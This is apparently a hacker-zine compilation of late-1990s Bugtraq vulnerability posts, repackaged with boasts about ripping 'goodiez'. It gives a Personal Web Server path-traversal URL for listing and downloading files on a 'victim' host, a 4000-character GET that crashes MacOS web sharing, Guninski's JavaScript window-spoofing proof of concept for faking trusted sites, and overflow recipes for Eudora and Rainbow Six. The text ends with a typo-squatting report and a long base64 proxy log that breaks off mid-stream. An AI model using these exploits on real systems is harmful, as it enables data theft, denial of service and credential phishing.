more ripped from bugtraq goodiez, this onez GOOD tho :) While playing with Microsoft Personal Web Server (Frontpage-PWS32/3.0.2.926). I found that the following URL will list the root directory and be able to download any file you want. http://www.victim.com/....../ Index of /....../ WINDOWS My Documents Program Files FrontPage Webs AUTOEXEC.BAT COMMAND.COM and so on....... the bugtraq ripper strikes again!*(^!#(* yay! Sending... GET aaaaa[...x4000...]aaaaa HTTP/1.0 [followed by pressing return twice] to port 80 on an Apple Mac, MacOS 8.5.1, with web sharing enabled makes it change from "Web Sharing On" to "Web Sharing Off", presumably because the web server task dies. An annoying DoS, possibly worse, who knows (depends if they compiled with range checking on, what language they used, etc). -David. Netscape Communicator window spoofing bug There is a bug in Netscape Communicator 3.04,4.06,4.5 Win95 and 4.08 WinNT, which allows "window spoofing". After visiting a hostile page (or clicking a hostile link) a window is opened and its location is a trusted site. However, the content of the window is not that of the original site, but it is supplied by the owner of the page. So, the user is misled he is browising a trusted site, while he is browsing a hostile page and may provide sensitive information, such as credit card number. The bug may be exploited using HTML mail message. It needs Javascript enabled. Workaround: Disable Javascript Demonstration is available at: http://www.nat.bg/~joro/b14.html http://www.whitehats.com/guninski/b14.html This bug is different from the "frame spoofing vulnerability" The code is: ------------------------------- function doit() { a.document.open(); a.document.write("

Look at the location bar!
"); a.document.write("Go to Georgi Guninski's home page

"); a.document.close(); } function winopen() { a=window.open("view-source:javascript:location='http://www.yahoo.com';"); setTimeout('doit()',30000); } Follow this link to go to www.yahoo.com (or somewhere else) ------------------------------- Note: My web page has moved. Look below for the new URLs. Regards, Georgi Guninski http://www.nat.bg/~joro http://www.whitehats.com/guninski Eudora Attachment Buffer Overflow I have found another problem with Eudora, attachments, and long filenames that is similar to the the problem I found last year. If two messages are sent to an Eudora 4.1 user that have an attachment with a filename of around 231 or more, the next time the user checkes his mail Eudora crashes. I say 231 because C:\Program Files\Eudora\Attach\ is 31 characters + 231 = 262 = longer then Windows can handle. Eudora trucates the long filename correctly and thats why you cant't send just one messages with a long name, like you use to be able to do with Eudora 4.0. But it truncates it so the the path length is 259 characters which is the maximum. Then when it receives the second attachment it truncates, and trys to add a 1 to the end, this is where it crashes. This allows you to modify the return address to point to arbitrary code. Here is how i tested: Send message to myself with attchment that has a long filename Resend exact message Check my mail Eudora crashes Both the Win 95 and Win NT versions, along with the 4.2 beta of Eudora are affected. The vendor of Eudora, Qualcomm was notified of this problem on 3/12/99. Rainbow Six Buffer Overflow..... Brian Gemberling (camaro@ex-pressnet.com) Thu, 11 Feb 1999 17:37:43 -0500 * Messages sorted by: [ date ][ thread ][ subject ][ author ] * Next message: Ken Williams: "Pro/wuFTPD DoS (Was: Re: SECURITY: new wu-ftpd packages available" * Previous message: Casper Dik: "Re: SSH 1.x and 2.x Daemon" Rainbow Six Multiplayer can be crashed with a buffer overflow just like quake2... If someone makes the Nick something like... R700@#!@#@!KRDKJRKDJRKJELJAKRLEALJRHKJEHREKHLARNMBE$MNB#L$K#H$&YUFHOPSUYD)**ASD*&S&A*)(E&(*&@#*(&@(*&#J#@JKH#... you get the idea...Boom goes mr. server. Just thought I'd pass it on.. * Next message: Ken Williams: "Pro/wuFTPD DoS (Was: Re: SECURITY: new wu-ftpd packages available" * Previous message: Casper Dik: "Re: SSH 1.x and 2.x Daemon" Spoofed Yahoo web site - www.yaho.co.uk Paul Murphy (Paul.Murphy@GEMINI-RESEARCH.CO.UK) Mon, 8 Feb 1999 19:14:27 +0000 * Messages sorted by: [ date ][ thread ][ subject ][ author ] * Next message: Michael: "FakeBo 0.3.1 & nmap" * Previous message: David LeBlanc: "Re: ISS Internet Scanner Cannot be relied upon for conclusive" * Next in thread: Paul McGovern: "Re: Spoofed Yahoo web site - www.yaho.co.uk" This is a MIME message. If you are reading this text, you may want to consider changing to a mail reader or gateway that understands how to properly handle MIME multipart messages. --=_5A0DDE8C.57365AD0 Content-Type: text/plain; charset=US-ASCII Content-Disposition: inline Hi, You might like to try this one on for size, and advise whether there's anything nasty going on behind this site..... One of our users mistyped the URL of the Yahoo portal site in the UK, and instead of the normal site, he got a graphic saying "Oops - looks like a typo". After a few seconds, he found the normal Yahoo site, and assumed all was well. All of our Internet access is forced through a local proxy server, and our logs are scanned for anything naughty, so I was surprised to discover the attached log entries, which after verification, I can show is the correct result when accessing "www.yaho.co.uk". It appears that this does a silent redirect to the correct site, but with a lot of funny stuff going on in the meantime, some of it on what appear to be proxy server ports. The obvious concern is that users will not notice the redirect, use the search to go to Amazon or some other online shop, enter their credit card details with the standard 40 bit encryption, and feel safe. Meanwhile, someone else also has the whole session, does a brute force attack against the session key, and within hours has the credit card details.... Am I just being paranoid, or is this for real? The access to "www.nutzwerk.de" at 18:16:37 in particular seems significant, since this would be a nice way to track who is being led astray, and how successful your ploy had been.... Paul. ----------------------------------------------------------------------------- Paul Murphy - Head of I.T., Gemini Research Ltd 162 Science Park, Cambridge CB4 4GH Tel. 01223 435305 Fax. 01223 435301 http://www.gemini-research.co.uk/ --=_5A0DDE8C.57365AD0 Content-Type: application/octet-stream; name="yahoo.log" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="yahoo.log" c3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNjoxNiAr MDAwMF0gIkdFVCBodHRwOi8vd3d3LnlhaG8uY28udWsvIEhUVFAvMS4wIiAyMDAgNjA0DQpzdXBw b3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE2OjE5ICswMDAw XSAiR0VUIGh0dHA6Ly93d3cuYWx0YXZpc3RhLmNvbS9hdi9naWZzL2RhcnQuZ2lmIEhUVFAvMS4w IiAyMDAgMjY2DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5 OjE4OjE2OjE5ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuYWx0YXZpc3RhLmNvbS9hdi9naWZzL2dy YXlkb3QuZ2lmIEhUVFAvMS4wIiAyMDAgODYNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVr IC0gLSBbMDgvRmViLzE5OTk6MTg6MTY6MjIgKzAwMDBdICJHRVQgaHR0cDovL3d3dy5udXR6d2Vy ay5kZS90eXBvLmh0bWwgSFRUUC8xLjAiIDIwMCAxODMyDQpzdXBwb3J0LmdlbWluaS1yZXNlYXJj aC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE2OjIzICswMDAwXSAiR0VUIGh0dHA6Ly93d3cu eGFob28uY29tL29vb3BzMi5naWYgSFRUUC8xLjAiIDIwMCAyNzg4DQpzdXBwb3J0LmdlbWluaS1y ZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE2OjI4ICswMDAwXSAiR0VUIGh0dHA6 Ly93d3cudHliby5uZXQvbG9hZHdhcnMuaHRtbCBIVFRQLzEuMCIgMjAwIDQyNQ0Kc3VwcG9ydC5n ZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNjoyOSArMDAwMF0gIkdF VCBodHRwOi8vd3d3LnR5Ym8ubmV0L3N0YXJ3YXJzLmpzIEhUVFAvMS4wIiAyMDAgNTc2NQ0Kc3Vw cG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNjozMCArMDAw MF0gIkdFVCBodHRwOi8vd3d3LnR5Ym8ubmV0L2Vncm91cHMuaHRtbCBIVFRQLzEuMCIgMjAwIDE4 NjkNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTY6 MzAgKzAwMDBdICJHRVQgaHR0cDovL3d3dy5hYWUubmV0L3R5Ym8vZGlzbmV5Lmh0bWwgSFRUUC8x LjAiIDIwMCAyMTE0DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8x OTk5OjE4OjE2OjMxICswMDAwXSAiR0VUIGh0dHA6Ly93d3cubG90dG9zZXguY29tL2dhbWVzdGFy dC5odG0gSFRUUC8xLjAiIDIwMCAzNTAyDQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAt IC0gWzA4L0ZlYi8xOTk5OjE4OjE2OjMxICswMDAwXSAiR0VUIGh0dHA6Ly93d3cubG90dG9zZXgu Y29tL2hvbWUuaHRtIEhUVFAvMS4wIiAyMDAgOTY3DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5j by51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE2OjMyICswMDAwXSAiR0VUIGh0dHA6Ly93d3cudHli by5uZXQvYmxhbmsuaHRtbCBIVFRQLzEuMCIgMjAwIDExMQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFy Y2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNjozNSArMDAwMF0gIkdFVCBodHRwOi8vd3d3 LmxvdHRvc2V4LmNvbS9ob21lLmpzIEhUVFAvMS4wIiAyMDAgMzkzNw0Kc3VwcG9ydC5nZW1pbmkt cmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNjozNSArMDAwMF0gIkdFVCBodHRw Oi8vd3d3LmxvdHRvc2V4LmNvbS9zdGF0dXNleC5qcyBIVFRQLzEuMCIgMjAwIDQzMjANCnN1cHBv cnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTY6MzYgKzAwMDBd ICJHRVQgaHR0cDovL3d3dy50eWJvLm5ldC9zdGF0dXNleC5qcyBIVFRQLzEuMCIgMjAwIDM0NjgN CnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTY6MzYg KzAwMDBdICJHRVQgaHR0cDovL3d3dy5hYWUubmV0L3R5Ym8vbnN0YXR1cy5qcyBIVFRQLzEuMCIg MjAwIDIwMjkNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6 MTg6MTY6MzcgKzAwMDBdICJHRVQgaHR0cDovL3d3dy5udXR6d2Vyay5kZS9jZ2ktYmluL25ld2Nv dW50P251dHp3MzAxJndpZHRoPTUmZm9udD1kaWdpdGFsIEhUVFAvMS4wIiAyMDAgMTg2DQpzdXBw b3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE2OjQxICswMDAw XSAiR0VUIGh0dHA6Ly93d3cueWFob28uY29tLyBIVFRQLzEuMCIgMjAwIDQ4NTYNCnN1cHBvcnQu Z2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTY6NDEgKzAwMDBdICJH RVQgaHR0cDovL3d3dy55YWhvby5jby51ay8gSFRUUC8xLjAiIDIwMCAxNDA3Nw0Kc3VwcG9ydC5n ZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNjo1NSArMDAwMF0gIkdF VCBodHRwOi8vd3d3LnR5Ym8ubmV0L3dlbGNvbWUuZ2lmIEhUVFAvMS4wIiAyMDAgNzY4OQ0Kc3Vw cG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNjo1NiArMDAw MF0gIkdFVCBodHRwOi8vd3d3LmxvdHRvc2V4LmNvbS9ibGFuay5odG0gSFRUUC8xLjAiIDIwMCAx NDkNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTY6 NTcgKzAwMDBdICJHRVQgaHR0cDovL3d3dy55YWhvby5jby51ay9pbWFnZXMvc20uZ2lmIEhUVFAv MS4wIiAyMDAgMzU3DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8x OTk5OjE4OjE2OjU3ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuYWFlLm5ldC90eWJvL29vb3BzMi5n aWYgSFRUUC8xLjAiIDIwMCAyNzg4DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0g WzA4L0ZlYi8xOTk5OjE4OjE2OjU3ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cubG90dG9zZXguY29t L3N0YXR1c2V4LmpzIEhUVFAvMS4wIiAzMDQgLQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28u dWsgLSAtIFswOC9GZWIvMTk5OToxODoxNjo1OCArMDAwMF0gIkdFVCBodHRwOi8vd3d3LmxvdHRv c2V4LmNvbS9zdGFydC5odG0gSFRUUC8xLjAiIDIwMCAzOTA3DQpzdXBwb3J0LmdlbWluaS1yZXNl YXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjAxICswMDAwXSAiR0VUIGh0dHA6Ly9h ZHVsdGFkLmhvdGx5bnh4eC5jb20vaG90YXBpLndzYS9HSUYxOTU1IEhUVFAvMS4wIiAzMDIgMA0K c3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzowNCAr MDAwMF0gIkdFVCBodHRwOi8vd3d3LmJhbm5lcmJyb2tlcnMuY29tL2ltYWdlcy9hZF9pbmZvLmdp ZiBIVFRQLzEuMCIgMjAwIDc5OQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFsw OC9GZWIvMTk5OToxODoxNzowNSArMDAwMF0gIkdFVCBodHRwOi8vaW1hZ2UuY2xpY2sybmV0LmNv bS8/QTAwMDI0MSw2IEhUVFAvMS4wIiAzMDIgMjM4DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5j by51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjA1ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cubG90 dG9zZXguY29tL2Jhbm5lci9rYXJhLmpwZyBIVFRQLzEuMCIgMjAwIDE3NzkwDQpzdXBwb3J0Lmdl bWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjA2ICswMDAwXSAiR0VU IGh0dHA6Ly93d3cueWFob28uY28udWsvYWR2L2ltYWdlcy95Y2xpY2tfd29yazJfaG1wZ191ay5n aWYgSFRUUC8xLjAiIDIwMCAzMDY1DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0g WzA4L0ZlYi8xOTk5OjE4OjE3OjA3ICswMDAwXSAiR0VUIGh0dHA6Ly8yMDkuOTAuMTI4LjU1L2Ns aWNrMi9hZF9iaW4vY2FtcGFpZ25zL2h0bDJfcG9ydC5naWYgSFRUUC8xLjAiIDIwMCAzNDQwDQpz dXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjA4ICsw MDAwXSAiR0VUIGh0dHA6Ly93d3cuZWFkcy5jb20vYWRzZXJ2ZS9hZHNlcnZlLmRsbC9iYW5uZXI/ R0ExMDM0NywwLDAgSFRUUC8xLjAiIDIwMCA1Njg1DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5j by51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjA4ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuYmFu bmVyYnJva2Vycy5jb20vY2dpLWJpbi9iYW5uZXIuY2dpP3Byb2ZpbGUxJndvbm5lMTUgSFRUUC8x LjAiIDIwMCAxMTQ4NA0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIv MTk5OToxODoxNzowOSArMDAwMF0gIkdFVCBodHRwOi8vd3d3LnlhaG9vLmNvLnVrL2ltYWdlcy91 a19tYWluNGMuZ2lmIEhUVFAvMS4wIiAyMDAgNjQ0MA0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2gu Y28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzoxNCArMDAwMF0gIkdFVCBodHRwOi8vYWRzZXJ2 ZS5iYW5uZXJwb29sLmNvbS9jZ2ktYmluL3Nob3diYW5uZXI/TjAwMDAwNTQ4MyBIVFRQLzEuMCIg MjAwIDMyNjYNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6 MTg6MTc6MTUgKzAwMDBdICJHRVQgaHR0cDovLzIwNy4xNTEuMTguMTc3L2Jhbm5lcnMvaGxuL2Ns aWVudHMvcGJhbjNfdjMuZ2lmIEhUVFAvMS4wIiAyMDAgMTQ4MDANCnN1cHBvcnQuZ2VtaW5pLXJl c2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTc6MTkgKzAwMDBdICJHRVQgaHR0cDov L3d3dy5sb3R0b3NleC5jb20vYmFubmVyL21hY2hpbmUuZ2lmIEhUVFAvMS4wIiAyMDAgMTczNzIN CnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTc6MTkg KzAwMDBdICJHRVQgaHR0cDovL3d3dy5sb3R0b3NleC5jb20vSExOYnV0dG9uLmdpZiBIVFRQLzEu MCIgMjAwIDEzMTQwDQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8x OTk5OjE4OjE3OjMwICswMDAwXSAiR0VUIGh0dHA6Ly93aXAuZG91YmxlY2xpY2submV0L3ZpZXdh ZC8zMjg0LVNsaWRlcjEyNXgxMjVfU3BlZWRfQW5uLmdpZiBIVFRQLzEuMCIgNTAwIDgzNg0Kc3Vw cG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzozMCArMDAw MF0gIkdFVCBodHRwOi8vd2lwLmRvdWJsZWNsaWNrLm5ldC92aWV3YWQvMjcxMDQtMTIweDYwU2hv cFByb21vNC5HSUYgSFRUUC8xLjAiIDUwMCA4MjQNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNv LnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTc6MzQgKzAwMDBdICJHRVQgaHR0cDovL3d3dy5sb3R0 b3NleC5jb20vc3RhdHVzZXguanMgSFRUUC8xLjAiIDMwNCAtDQpzdXBwb3J0LmdlbWluaS1yZXNl YXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjM0ICswMDAwXSAiR0VUIGh0dHA6Ly93 d3cudHliby5uZXQvc3RhdHVzZXguanMgSFRUUC8xLjAiIDMwNCAtDQpzdXBwb3J0LmdlbWluaS1y ZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjM0ICswMDAwXSAiR0VUIGh0dHA6 Ly93d3cubG90dG9zZXguY29tL2hvbWUuanMgSFRUUC8xLjAiIDMwNCAtDQpzdXBwb3J0LmdlbWlu aS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjM1ICswMDAwXSAiR0VUIGh0 dHA6Ly93d3cudHliby5uZXQvZG93bmxvYWQuaHRtbCBIVFRQLzEuMCIgMjAwIDE2MDMNCnN1cHBv cnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTc6MzUgKzAwMDBd ICJHRVQgaHR0cDovL3d3dy5iYW5uZXJicm9rZXJzLmNvbS9jZ2ktYmluL2Jhbm5lci5jZ2k/cHJv ZmlsZTEmd29ubmUxNSBIVFRQLzEuMCIgMjAwIDExNDg0DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJj aC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjM1ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cu bG90dG9zZXguY29tL2JsYW5rLmh0bSBIVFRQLzEuMCIgMzA0IC0NCnN1cHBvcnQuZ2VtaW5pLXJl c2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTc6MzUgKzAwMDBdICJHRVQgaHR0cDov L3d3dy5sb3R0b3NleC5jb20vc3RhcnQuaHRtIEhUVFAvMS4wIiAzMDQgLQ0Kc3VwcG9ydC5nZW1p bmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzozNSArMDAwMF0gIkdFVCBo dHRwOi8vd3d3LnR5Ym8ubmV0L3N0YXR1c2V4LmpzIEhUVFAvMS4wIiAzMDQgLQ0Kc3VwcG9ydC5n ZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzozNSArMDAwMF0gIkdF VCBodHRwOi8vd3d3LmFhZS5uZXQvdHliby9sb3R0by5odG1sIEhUVFAvMS4wIiAyMDAgNDYwDQpz dXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjM1ICsw MDAwXSAiR0VUIGh0dHA6Ly93d3cubG90dG9zZXguY29tL3N0YXR1c2V4LmpzIEhUVFAvMS4wIiAz MDQgLQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODox NzozNyArMDAwMF0gIkdFVCBodHRwOi8vd3d3LmFhZS5uZXQvdHliby9sb3R0b25hdi5qcyBIVFRQ LzEuMCIgMjAwIDQ0MDMNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmVi LzE5OTk6MTg6MTc6MzggKzAwMDBdICJHRVQgaHR0cDovL3d3dy5zdGFyc2Fkcy5jb20vY2dpLWJp bi9zZXJ2ZS5jZ2k/SUQ9TnV0endlcmsgSFRUUC8xLjAiIDIwMCAyMjAwDQpzdXBwb3J0LmdlbWlu aS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjM4ICswMDAwXSAiUE9TVCBo dHRwOi8vYWRzZXJ2ZS5iYW5uZXJwb29sLmNvbS9jZ2ktYmluL2dvYmFubmVyP04wMDAwMDU0ODMg SFRUUC8xLjAiIDMwMiAxOTcNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgv RmViLzE5OTk6MTg6MTc6NDAgKzAwMDBdICJHRVQgaHR0cDovL2ltYWdlLmNsaWNrMm5ldC5jb20v P0EwMDM3ODQsMSBIVFRQLzEuMCIgMzAyIDIzNw0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28u dWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzo0MyArMDAwMF0gIkdFVCBodHRwOi8vd3d3LmN5YmVy dGhyaWxsLmNvbS9jZ2ktYmluL3Nwb25zb3Ivc3RpL3JpY29jaGV0LmNnaT90eXBvPXlhaG9vLmRl IEhUVFAvMS4wIiAzMDIgMA0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9G ZWIvMTk5OToxODoxNzo0NCArMDAwMF0gIkdFVCBodHRwOi8vd3d3LkNhc2lub0ZhbnRhc3kuY29t OjgwODAvaW5kZXguc2h0bWw/VjgwMCBIVFRQLzEuMCIgMjAwIDYyNA0Kc3VwcG9ydC5nZW1pbmkt cmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzo0NCArMDAwMF0gIkdFVCBodHRw Oi8vd3d3LmJhbm5lcmJyb2tlcnMuY29tL2NnaS1iaW4vYmFubmVyLmNnaT9wcm9maWxlMSZ3b25u ZTE1IEhUVFAvMS4wIiAyMDAgMTE0ODQNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0g LSBbMDgvRmViLzE5OTk6MTg6MTc6NDUgKzAwMDBdICJHRVQgaHR0cDovL3d3dy5DYXNpbm9GYW50 YXN5LmNvbTo4MDgwL2N1cnRhaW4uc2h0bWw/VjgwMCBIVFRQLzEuMCIgMjAwIDE4OTUNCnN1cHBv cnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTc6NDUgKzAwMDBd ICJHRVQgaHR0cDovL3d3dy5DYXNpbm9GYW50YXN5LmNvbTo4MDgwL21haW4uc2h0bWw/VjgwMCBI VFRQLzEuMCIgMjAwIDIwODcNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgv RmViLzE5OTk6MTg6MTc6NDUgKzAwMDBdICJHRVQgaHR0cDovLzIwOS45MC4xMjguNTUvY2xpY2sy L2FkX2Jpbi9jYW1wYWlnbnMvYzYtMzE2cC0uZ2lmIEhUVFAvMS4wIiAyMDAgMTEyNTENCnN1cHBv cnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTc6NDYgKzAwMDBd ICJHRVQgaHR0cDovL3d3dy5DYXNpbm9GYW50YXN5LmNvbTo4MDgwL2ltZy9nZXJtYW4uZ2lmIEhU VFAvMS4wIiAyMDAgMTA0Nw0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9G ZWIvMTk5OToxODoxNzo0NiArMDAwMF0gIkdFVCBodHRwOi8vd3d3LkNhc2lub0ZhbnRhc3kuY29t OjgwODAvaW1nL2VuZ2xpc2guZ2lmIEhUVFAvMS4wIiAyMDAgMTM3NA0Kc3VwcG9ydC5nZW1pbmkt cmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzo0NyArMDAwMF0gIkdFVCBodHRw Oi8vd3d3LkNhc2lub0ZhbnRhc3kuY29tOjgwODAvaW1nL2tvcmVhbi5naWYgSFRUUC8xLjAiIDIw MCAxNDc2DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4 OjE3OjQ4ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuc3RhcnNhZHMuY29tL2NnaS1iaW4vY2xpY2su Y2dpP0lEPU51dHp3ZXJrIEhUVFAvMS4wIiAzMDIgMjc1DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJj aC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjQ4ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cu Q2FzaW5vRmFudGFzeS5jb206ODA4MC9pbWcvY3VydGFpbi5naWYgSFRUUC8xLjAiIDIwMCA0Mjc1 DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjQ5 ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuQ2FzaW5vRmFudGFzeS5jb206ODA4MC9pbWcvZnJlbmNo LmdpZiBIVFRQLzEuMCIgMjAwIDEwNjgNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0g LSBbMDgvRmViLzE5OTk6MTg6MTc6NTAgKzAwMDBdICJHRVQgaHR0cDovL3d3dy5DYXNpbm9GYW50 YXN5LmNvbTo4MDgwL2ltZy9qYXBhbmVzZS5naWYgSFRUUC8xLjAiIDIwMCAxMDY2DQpzdXBwb3J0 LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjUwICswMDAwXSAi R0VUIGh0dHA6Ly93d3cuQ2FzaW5vRmFudGFzeS5jb206ODA4MC9pbWcvc3BhbmlzaC5naWYgSFRU UC8xLjAiIDIwMCAxMDExDQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0Zl Yi8xOTk5OjE4OjE3OjUyICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuQ2FzaW5vRmFudGFzeS5jb206 ODA4MC9pbWcva29ydGV4dC5naWYgSFRUUC8xLjAiIDIwMCA4OTcNCnN1cHBvcnQuZ2VtaW5pLXJl c2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTc6NTMgKzAwMDBdICJHRVQgaHR0cDov L3d3dy5iYW5uZXJicm9rZXJzLmNvbS9jZ2ktYmluL2Jhbm5lci5jZ2k/cHJvZmlsZTEmd29ubmUx NSBIVFRQLzEuMCIgMjAwIDExNDg0DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0g WzA4L0ZlYi8xOTk5OjE4OjE3OjUzICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuQ2FzaW5vRmFudGFz eS5jb206ODA4MC9pbWcvY2hpbmVzZS5naWYgSFRUUC8xLjAiIDIwMCAxMTc1DQpzdXBwb3J0Lmdl bWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjU0ICswMDAwXSAiR0VU IGh0dHA6Ly93d3cuQ2FzaW5vRmFudGFzeS5jb206ODA4MC9pbWcvbmV0aGVybGFuZHMuZ2lmIEhU VFAvMS4wIiAyMDAgMTA1NQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9G ZWIvMTk5OToxODoxNzo1NCArMDAwMF0gIkdFVCBodHRwOi8vd3d3LkNhc2lub0ZhbnRhc3kuY29t 